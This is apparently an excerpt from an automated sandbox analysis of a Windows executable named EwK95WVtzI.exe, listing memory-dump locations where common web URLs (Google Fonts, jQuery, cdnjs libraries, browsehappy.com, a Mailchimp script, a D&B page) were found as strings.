                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com/js/plusone.js
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1452531175.0000000007A80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1980163682.0000000007980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://browsehappy.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1998090500.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.css
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js?ver=1.0.0
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chimpstatic.com/mcjs-connected/js/users/4c8ec8296850930fd1c281270/48b88329c63ed7575f5b4b054.
                Source: EwK95WVtzI.exe, 00000000.00000003.1950572130.0000000001560000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1935975231.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1419085603.0000000004870000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1944036001.0000000001570000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1407073781.0000000004760000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-2.1.4.min.js
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dunsregistered.dnb.com
                Source: EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1998090500.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1496465166.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504588099.0000000004860000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1853565854.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1784646410.0000000004190000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1525347007.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871154486.0000000003A50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1659128921.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1610312709.0000000003F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Poppins%3Aital%2Cwght%400%2C100%3B0%2C200%3B0%2C300%3B0%2C5
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C300i%2C400%2C400i%2C700%2C700i&subset=la
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
